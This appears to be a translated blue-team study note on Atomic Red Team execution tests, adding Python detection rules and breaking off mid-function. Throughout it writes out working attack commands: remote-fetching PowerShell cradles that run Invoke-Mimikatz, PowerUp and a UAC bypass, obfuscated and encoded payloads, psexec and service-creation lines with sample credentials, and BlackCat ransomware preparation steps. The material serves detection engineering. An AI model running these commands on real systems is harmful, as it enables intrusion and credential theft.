Atomic - Execution Tactics
- Technique IDs that are effective and can be written into security policy for enforcement
- Reference:
- https://atomicredteam.io/atomics/#execution
Overview of the specific techniques
execution
| ID | Technique |
|---|---|
| T1610 | Deploy a container |
| T1609 | Kubernetes Exec Into Container |
| T1569.002 | System Services: Service Execution |
| T1569.001 | System Services: Launchctl |
| T1559 | Inter-Process Communication |
| T1559.002 | Inter-Process Communication: Dynamic Data Exchange |
| T1204.003 | User Execution: Malicious Image |
| T1204.002 | User Execution: Malicious File |
| T1106 | Native API (excluded) |
| T1059.007 | Command and Scripting Interpreter: JavaScript |
| T1059.006 | Command and Scripting Interpreter: Python |
| T1059.005 | Command and Scripting Interpreter: Visual Basic |
| T1059.004 | Command and Scripting Interpreter: Bash |
| T1059.003 | Command and Scripting Interpreter: Windows Command Shell |
| T1059.002 | Command and Scripting Interpreter: AppleScript |
| T1059.001 | Command and Scripting Interpreter: PowerShell |
| T1047 | Windows Management Instrumentation (WMI) |
Host model - System Services
- T1569.002 System Services: Service Execution
- T1569.001 System Services: Launchctl
Host model - System Services - Service Execution
1. Execute a command by starting it as a service
sc.exe create artservice binPath= "%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt"
sc.exe start ARTService
sc.exe delete ARTService
2. Execute a command on a remote host with psexec
psexec.exe \\localhost -u DOMAIN\Administrator -p P@ssw0rd1 -accepteula "C:\Windows\System32\calc.exe"
3. Execute a command on a remote host with the Impacket psexec.py script
psexec.py 'domain/administrator:pxssw0rd1@127.0.0.1' 'whoami'
4. Execute commands the way the BlackCat ransomware does before encryption
cmd.exe /c "wmic csproduct get UUID"
cmd.exe /c "fsutil behavior set SymlinkEvaluation R2L:1"
cmd.exe /c "fsutil behavior set SymlinkEvaluation R2R:1"
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f
copy $pathtoatomicsfolder\T1569.002\bin\PsExec.exe $env:temp
cmd.exe /c "$env:temp\psexec.exe -accepteula \\#{targethost} cmd.exe /c echo "--access-token""
5. Execute a command on a remote host with the remcom tool
remcom.exe \\localhost /user:administrator /pwd:Pxxword1 cmd.exe
6. Service creation as performed by the Snake malware
sc.exe create "WerFaultSvc" binPath= "$env:windir\WinSxS\x86_microsoft-windows-errorreportingfaults_31bf3856ad364e35_4.0.9600.16384_none_a13f7e283339a050\WerFault.exe" DisplayName= "WerFault Service" start= auto
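The six service-execution variants above are what a detection rule has to recognise in process-creation telemetry. The following Python is an added example, not code from the page or from Atomic Red Team: a small rule set run over constructed Sysmon-style process records whose command lines are copied from tests 1, 2, 4 and 6 above, plus one constructed benign control. The record layout (`image`, `parent`, `cmdline`), the sample paths and the `PSEXESVC.exe` parent/child rule (a well-known PsExec service artifact that the page itself does not list) are assumptions.

```python
"""Detection rules for the service-execution tests (T1569.002).

Added example, not part of the page or of Atomic Red Team: a rule set run
over constructed process-creation records (Sysmon Event ID 1 style dicts
with "image", "parent" and "cmdline" keys).  The command lines are copied
from the tests above; the record layout and paths are assumptions.
"""
import re

# A service binary that is itself a shell or script host running an inline command.
INTERPRETERS = re.compile(r"%COMSPEC%|\bcmd(\.exe)?\b|powershell|pwsh|wscript|cscript|mshta|rundll32", re.I)
SC_CREATE = re.compile(r'\bsc(\.exe)?\s+create\b.*?binPath=\s*"?(?P<bin>[^"]+)', re.I)
HIDDEN_PS = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile", re.I)
REMOTE_EXEC_TOOLS = re.compile(r"\b(psexec(\.exe|\.py)?|remcom(\.exe)?)\b", re.I)
# Pre-encryption preparation from test 4 (BlackCat): symlink evaluation and SMB MaxMpxCt changes.
BLACKCAT_PREP = [
    re.compile(r"fsutil\s+behavior\s+set\s+SymlinkEvaluation\s+R2[LR]:1", re.I),
    re.compile(r"reg(\.exe)?\s+add\s+.*LanmanServer\\Parameters.*MaxMpxCt", re.I),
]
# Test 6 (Snake): a service binary under WinSxS, a directory services normally never start from.
WINSXS_BIN = re.compile(r"\\WinSxS\\", re.I)


def evaluate(event):
    """Return the rule names one process-creation event triggers (empty list if none)."""
    cmd = event.get("cmdline", "")
    image = event.get("image", "")
    parent = event.get("parent", "")
    hits = []
    m = SC_CREATE.search(cmd)
    if m:
        binpath = m.group("bin")
        if INTERPRETERS.search(binpath):
            hits.append("service_binpath_interpreter")
        if HIDDEN_PS.search(binpath):
            hits.append("service_binpath_hidden_powershell")
        if WINSXS_BIN.search(binpath):
            hits.append("service_binpath_winsxs")
    if REMOTE_EXEC_TOOLS.search(image) or REMOTE_EXEC_TOOLS.search(cmd):
        hits.append("remote_exec_tool")
    if any(rx.search(cmd) for rx in BLACKCAT_PREP):
        hits.append("blackcat_pre_encryption_prep")
    # Target-side artifact of PsExec: services.exe starting PSEXESVC.exe (known tool behaviour, not from the page).
    if parent.lower().endswith("services.exe") and image.lower().endswith("psexesvc.exe"):
        hits.append("psexesvc_started")
    return hits


def scan(events):
    """Evaluate every event; returns one hit list per event, in input order."""
    return [evaluate(e) for e in events]


# Constructed records; command lines from tests 1, 6, 4 and 2 above, plus one benign control.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\sc.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'sc.exe create ARTService binPath= "%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt"'},
    {"image": r"C:\Windows\System32\sc.exe", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'sc.exe create "WerFaultSvc" binPath= "C:\Windows\WinSxS\x86_microsoft-windows-errorreportingfaults_31bf3856ad364e35_4.0.9600.16384_none_a13f7e283339a050\WerFault.exe" DisplayName= "WerFault Service" start= auto'},
    {"image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd.exe /c "fsutil behavior set SymlinkEvaluation R2L:1"'},
    {"image": r"C:\Tools\psexec.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'psexec.exe \\localhost -u DOMAIN\Administrator -p P@ssw0rd1 -accepteula "C:\Windows\System32\calc.exe"'},
    {"image": r"C:\Windows\System32\sc.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'sc.exe create ExampleAgent binPath= "C:\Program Files\ExampleVendor\agent.exe" start= auto'},
]

if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(hits or "-", "<=", event["cmdline"][:70])
```

The binPath rule is the one worth tuning first: legitimate installers also register services, but their binaries are executables under Program Files, not `%COMSPEC%` or `powershell.exe` with `-w hidden`.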
Host model - System Services - Launchctl
This scenario applies to macOS: launchctl plays the same role there that systemd does on Linux, and it is used to manage macOS services.
launchctl submit -l #{label_name} -- #{executable_path}
This chapter does not cover macOS test adaptation.
Host model - Inter-Process Communication
- Atomic Test #2 - Cobalt Strike Lateral Movement (psexec_psh) pipe
- Atomic Test #4 - Cobalt Strike post-exploitation pipe (4.2 and later)
- Atomic Test #5 - Cobalt Strike post-exploitation pipe (before 4.2)
1. Cobalt Strike Artifact Kit pipe
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 1
2. Cobalt Strike Lateral Movement (psexec_psh) pipe
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 2
3. Cobalt Strike SSH (postex_ssh) pipe
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 3
4. Cobalt Strike post-exploitation pipe (4.2 and later)
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 4
5. Cobalt Strike post-exploitation pipe (before 4.2)
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 5
At present host-level inter-process communication cannot be inspected in depth; external detection can only do basic keyword matching on the command line, so it is enough to add the following keyword to the advanced intelligence library:
namedpipes_executor.exe
Host model - Inter-Process Communication - Dynamic Data Exchange
Judging from the detailed steps, this likewise cannot be detected at present, nor matched by keyword.
Host model - User Execution - Malicious File
See the link below. I looked at the 11 ways it describes of luring or tricking a user into executing a malicious file; all of them are fairly involved, and detecting them would require working across several dimensions. One very obvious feature I did find: the malicious code is executed from the command line at the same time as the malicious file is downloaded by one command or another, which means these cases usually include a download step, and the only thing that varies is the form of command used to download the malicious file.
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md
Command-line download signatures recorded
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
echo var url = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript %TEMP%\OSTapGet.js
Invoke-WebRequest http://amtso.eicar.org/PotentiallyUnwanted.exe -OutFile $env:TEMP/PotentiallyUnwanted.exe
Invoke-WebRequest -OutFile $env:Temp\test10.lnk "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk"
Host model - User Execution - Malicious Image
This is really the same as User Execution - Malicious File above; the only difference is that the downloaded file is an image file.
Command-line download signatures recorded
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.003/src/qbot-test.iso" -OutFile "$env:TEMP\qbot-test.iso")
Host model - Native API
Of the steps executed here, the first is compiled with csc.exe, and the other three use WinPwn to download the corresponding PowerShell scripts and execute them.
Command-line download signatures recorded
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystem.ps1')
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystemBind.ps1')
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/NamedPipe/NamedPipeSystem.ps1')
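The three "command-line download signatures" lists above (Malicious File, Malicious Image, Native API) share one shape: a fetch primitive paired with either an execute primitive (an in-memory cradle) or a write-to-disk primitive (a staged download), and in the OSTap case a script host started from the temp directory as the second step. The Python below is an added example, not code from the page or from Atomic Red Team: it classifies one command line into those tiers and extracts the remote URL for enrichment. The sample lines are copied from the lists above and from the mshta cradle in the PowerShell section later on, with one constructed benign control; the tier names and the `script_host_from_temp` rule are assumptions.

```python
"""Download-cradle tiers for Windows command lines (T1204.002, T1204.003, Native API section).

Added example, not part of the page or of Atomic Red Team.  Input is one
command-line string as process-creation telemetry records it (assumption).
"""
import re

URL_RE = re.compile(r"""https?://[^\s'")\]]+""", re.I)

FETCH = {
    "ps_webclient": re.compile(r"Net\.WebClient|DownloadString|DownloadFile", re.I),
    "ps_iwr": re.compile(r"\b(iwr|Invoke-WebRequest)\b", re.I),
    "msxml_http": re.compile(r"MSXML2\.ServerXMLHTTP", re.I),
    "xml_load": re.compile(r"XmlDocument.*\.Load\(", re.I),
    "mshta_scriptlet": re.compile(r"\bmshta(\.exe)?\s+javascript:.*GetObject\('script:", re.I),
}
EXEC = {
    "iex": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "scriptlet_exec": re.compile(r"\.Exec\(\)", re.I),
}
TO_DISK = re.compile(r"-OutFile\b|DownloadFile\(|SaveToFile", re.I)
# Second half of the OSTap pattern: a script host executing something dropped in the temp directory.
SCRIPT_HOST_FROM_TEMP = re.compile(r"\b(cscript|wscript|mshta)(\.exe)?\b.*(%TEMP%|\\Temp\\|\$env:TEMP)", re.I)


def classify(cmdline):
    """Return a verdict dict for one command line, or None when nothing matched."""
    fetch = [n for n, rx in FETCH.items() if rx.search(cmdline)]
    execs = [n for n, rx in EXEC.items() if rx.search(cmdline)]
    if fetch and execs:
        category = "in_memory_cradle"
    elif fetch and TO_DISK.search(cmdline):
        category = "download_to_disk"
    elif fetch:
        category = "download_only"
    elif SCRIPT_HOST_FROM_TEMP.search(cmdline):
        category = "script_host_from_temp"
    else:
        return None
    return {"category": category, "fetch": fetch, "exec": execs, "urls": URL_RE.findall(cmdline)}


# Sample lines copied from the page (last one constructed as a benign-looking control).
SAMPLE_COMMANDS = [
    'IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)',
    "echo var url = \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt\", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > %TEMP%\\OSTapGet.js",
    r"cscript //E:Jscript %TEMP%\OSTapGet.js",
    r"Invoke-WebRequest http://amtso.eicar.org/PotentiallyUnwanted.exe -OutFile $env:TEMP/PotentiallyUnwanted.exe",
    "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/NamedPipe/NamedPipeSystem.ps1')",
    r"""C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close()" """,
    r"Invoke-WebRequest https://reports.example.invalid/daily.csv -OutFile C:\Reports\daily.csv",
]

if __name__ == "__main__":
    for line in SAMPLE_COMMANDS:
        verdict = classify(line)
        print(verdict["category"] if verdict else "-", verdict["urls"] if verdict else "", "<=", line[:60])
```

The `download_to_disk` tier is deliberately noisy (the last sample is an ordinary report download); it is meant to be joined with the next event for the dropped file rather than alerted on by itself, while `in_memory_cradle` stands on its own.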
Host model - Command and Scripting Interpreter - PowerShell
- Atomic Test #3 - Run Bloodhound from Memory using Download Cradle
- Atomic Test #15 - ATHPowerShellCommandLineParameter -Command parameter variations
- Atomic Test #17 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations
1. Download the PowerShell version of Mimikatz and run it to steal credentials
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
- Downloads and runs Invoke-Mimikatz
2. Run the BloodHound internal-network reconnaissance tool from local disk
- Introduction
BloodHound renders, as a graph of nodes and edges, the relationships among domain users, computers, groups, sessions and ACLs, together with every related user, group, computer, logon and access-control policy, giving a red team a more intuitive picture of the domain so it can analyse it more conveniently and escalate privileges within it faster. It also lets blue team members check their own network more thoroughly and keep the domain secure.
BloodHound exports the relevant information from inside the domain, then imports the collected data into a Neo4j database for display and analysis. Neo4j is a NoSQL graph database that stores structured data as a network rather than in tables; BloodHound builds on that property to analyse the data and present it more intuitively as a space of nodes.
write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
import-module #{file_path}\SharpHound.ps1
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
3. Use a download cradle to run BloodHound in memory
- What is a download cradle?
A download cradle is a one-liner whose main job is to download additional malicious code with further functionality from a remote host and execute it.
Reference: http://wp.blkstone.me/2019/03/what-is-download-cradles/
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
4. Obfuscation test
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
No signature can be extracted for detection.
5. Run Mimikatz via PsSendKeys
- The main effect is to run Mimikatz through PsSendKeys: once executed it automatically drives File Explorer and Notepad, types in the code, and finally displays the Mimikatz dump output.
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
6. Use the Invoke-AppPathBypass script to bypass UAC and execute a command
AppPathBypass: UAC bypass via App Paths, implemented in PowerShell
References:
https://zhuanlan.zhihu.com/p/29325846
https://gist.github.com/netbiosX/54a305a05b979e13d5cdffeba5436bcc
https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
7. Load a download cradle with the PowerShell MsXml COM object
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
8. Load a download cradle with PowerShell XML requests
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml');$Xml.command.a.execute | IEX"
9. Load a download cradle by invoking mshta.exe from PowerShell
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close()"
10. Use Invoke-DownloadCradle directly from PowerShell
Open PowerShell as a privileged user, then run Invoke-DownloadCradle.ps1
11. Fileless script execution in PowerShell
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
12. Run a downgraded PowerShell version for the attack
powershell.exe -version 2 -Command Write-Host $PSVersion
13. NTFS alternate data stream access
Add-Content -Path $env:TEMP\NTFS_ADS.txt -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path $env:TEMP\NTFS_ADS.txt -Stream 'streamcommand'
Invoke-Expression $streamcommand
14. PowerShell session creation and use
New-PSSession -ComputerName $env:COMPUTERNAME
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
15. Execute PowerShell with ATHPowerShellCommandLineParameter, varying the parameter form
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation C -Execute -ErrorAction Stop
16. Execute PowerShell with ATHPowerShellCommandLineParameter, varying the parameter form and encoding the arguments
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation C -UseEncodedArguments -EncodedArgumentsParamVariation EA -Execute -ErrorAction Stop
17. Execute PowerShell with ATHPowerShellCommandLineParameter, passing the EncodedCommand parameter
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation E -Execute -ErrorAction Stop
18. Execute PowerShell with ATHPowerShellCommandLineParameter, passing EncodedCommand together with UseEncodedArguments
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation E -UseEncodedArguments -EncodedArgumentsParamVariation EncodedArguments -Execute -ErrorAction Stop
19. Execute a command with obfuscated PowerShell
powershell.exe -e JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==
20. Invoke known malicious cmdlets from PowerShell
- What are cmdlets?
"Cmdlets" are the kind of command PowerShell uses. A cmdlet, in full "Cmdlet command", is a PowerShell command type used to carry out all sorts of tasks and operations. Each cmdlet stands for one specific operation and has its own parameters, options and output.
Using cmdlets in PowerShell lets users finish tasks faster and more efficiently, for example managing files, directories and processes, accessing network resources and configuring computer settings. Cmdlets are usually provided by script files that ship with PowerShell or are written by third-party developers, and you can also write your own.
In a sense they are like Python library modules that implement one class of functionality and are imported when needed, so here we treat this as a set of malicious PowerShell libraries.
$malcmdlets = #{Malicious_cmdlets}
# Define a stand-in function for each name, so that invoking it only prints a message instead of running the real cmdlet.
foreach ($cmdlets in $malcmdlets) {
    Invoke-Expression "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
    & $cmdlets}
Record these malicious cmdlets in particular:
"Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord"
21. Call PowerUp from the PowerShellMafia scripts to check for privilege-escalation paths
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
22. Abuse nslookup for DNS queries
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
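Tests 15 to 19 above make the same point from the detection side: powershell.exe accepts any unambiguous prefix of a parameter name, so `-e`, `-ec`, `-enc` and `-EncodedCommand` are one switch, and the payload behind it is base64 over UTF-16LE text. A detector therefore has to canonicalise the switches and decode the payload before it can match on anything, which is why the obfuscated command line in test 19 yields no static signature on its own. The Python below is an added example, not code from the page or from Atomic Red Team. The shortest accepted prefixes are taken from powershell.exe's command-line parser; the indicator regexes are assembled from the tests in this section; the three sample command lines are copied from test 1 and test 19 above and from test 7 of the WMI section below; `dwBoAG8AYQBtAGkA` is a constructed encoding of `whoami`; the malicious-cmdlet list is a subset of test 20's list.

```python
"""Canonicalising and decoding PowerShell command lines (T1059.001).

Added example, not part of the page or of Atomic Red Team.
"""
import base64
import re

# Full switch name -> shortest prefix powershell.exe accepts for it (from its command-line parser).
SWITCHES = {
    "EncodedCommand": "e", "ExecutionPolicy": "ex", "Command": "c", "NoProfile": "nop",
    "NonInteractive": "noni", "WindowStyle": "w", "Version": "v", "File": "f",
    "NoLogo": "nol", "NoExit": "noe", "Sta": "s", "Mta": "mta",
}
FLAG_SWITCHES = {"NoProfile", "NonInteractive", "NoLogo", "NoExit", "Sta", "Mta"}  # take no value
TOKEN_RE = re.compile(r'"[^"]*"|\'[^\']*\'|\S+')
MALICIOUS_CMDLETS = ["Invoke-Mimikatz", "Invoke-Shellcode", "Invoke-ReflectivePEInjection",
                     "Invoke-TokenManipulation", "Get-GPPPassword", "Out-Minidump"]
INDICATORS = {
    "download_cradle": re.compile(r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b).*(iex|Invoke-Expression)"
                                  r"|(iex|Invoke-Expression).*(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b)", re.I | re.S),
    "wmi_process_create": re.compile(r"Invoke-WmiMethod.*-Name\s+create", re.I),
    "obf_string_concat": re.compile(r'("[^"]*"\+){3,}'),                   # "Wr"+"it"+"e-H"+...
    "obf_format_operator": re.compile(r"'[^']*\{0\}[^']*'\s*-f\s", re.I),  # ('ie{0}' -f 'x')
    "obf_char_cast_join": re.compile(r"\[Char\]|-Join\b", re.I),
    "obf_dynamic_cmdlet_lookup": re.compile(r"\b(gcm|Get-Command)\b|InvokeCommand\.", re.I),
}


def canonical_switch(token):
    """Map '-enc', '/EncodedCommand', '-w', ... to the full switch name; None if not a switch or ambiguous."""
    if not token or token[0] not in "-/":
        return None
    name = token[1:].lower()
    hits = [full for full, short in SWITCHES.items()
            if full.lower().startswith(name) and name.startswith(short)]
    return hits[0] if len(hits) == 1 else None


def decode_encoded_command(b64):
    """-EncodedCommand carries base64 over UTF-16LE text; returns None if it does not decode."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_command_line(cmdline):
    """Split a powershell.exe command line into canonical switches and the script text it runs."""
    tokens = TOKEN_RE.findall(cmdline)
    switches, script, i = {}, "", 1          # tokens[0] is the executable
    while i < len(tokens):
        name = canonical_switch(tokens[i])
        if name is None:                      # first positional token: the rest is the script
            script = " ".join(tokens[i:]).strip('"')
            break
        if name in FLAG_SWITCHES:
            switches[name] = True
            i += 1
        elif name == "Command":               # everything after -Command is the script
            switches[name] = True
            script = " ".join(tokens[i + 1:]).strip('"')
            break
        else:
            switches[name] = tokens[i + 1] if i + 1 < len(tokens) else ""
            i += 2
    if "EncodedCommand" in switches:
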